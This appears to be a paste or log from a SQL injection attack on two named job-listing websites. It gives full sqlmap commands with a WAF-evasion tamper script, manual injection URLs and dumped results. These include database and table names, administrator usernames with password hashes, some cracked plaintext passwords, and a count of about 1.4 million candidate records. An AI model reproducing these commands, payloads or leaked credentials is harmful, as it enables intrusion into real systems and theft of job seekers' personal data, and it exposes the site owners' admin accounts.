sqlmap-shell> -u http://www.trabajos.com/ofertas-internacionales/?PALABRACLAVE=&AREA=&PAIS=1&desde=10 -T B001_USUARIO -C T001_IDUSUARIO,T001_NICK,T001_CODCR -D trabajos2007 --start=1 --stop=1000000 --dump --tamper="modsecurityversioned"

---------------------


http://www.trabajos.com/ofertas-int...4+from+B027_CANDIDATO+limit+174,1--+&desde=10
select count(*) from T027_CANDIDATO: '1392209'

Now 1.5 million.
 
Kill it.



Admin panel
http://www.franco-jobs.com/ADMIN/

no idea what this is
http://www.franco-jobs.com/bandwidth

-u http://www.franco-jobs.com/index.php?mod=search&search=1&employer=809 -p "employer" --dbms=MySQL 5.0.12 -v 3 --level=3 --technique=BEUSQ --tamper="modsecurityversioned"


web application technology: Apache
back-end DBMS: MySQL 5.5.42-37.1-log

database
[*] francoj1_francojobs

table: v3_admin_users
1::administrator::e99a18c428cb38d5f260853678922e03:: password abc123



table: websiteadmin_admin_users
1::administrator::0bb4caae84493ded659e9c8b5c2e1fcd:: password 2012pass
3::laurent::c28e039ce056c77d510b8c9281afc7bf
4::administrator2::e99a18c428cb38d5f260853678922e03:: password abc123
5::radu_admin::eb2b3ec262f1124d223c6aa2e6323c6f


http://www.franco-jobs.com/index.ph...FROM*/+/*!30183INFORMATION_SCHEMA.COLUMNS*/--



Outputs everyone onto the page, in the source

http://www.franco-jobs.com/index.ph...ROM*/+/*!30183websiteadmin_ext_jobseekers*/--
 

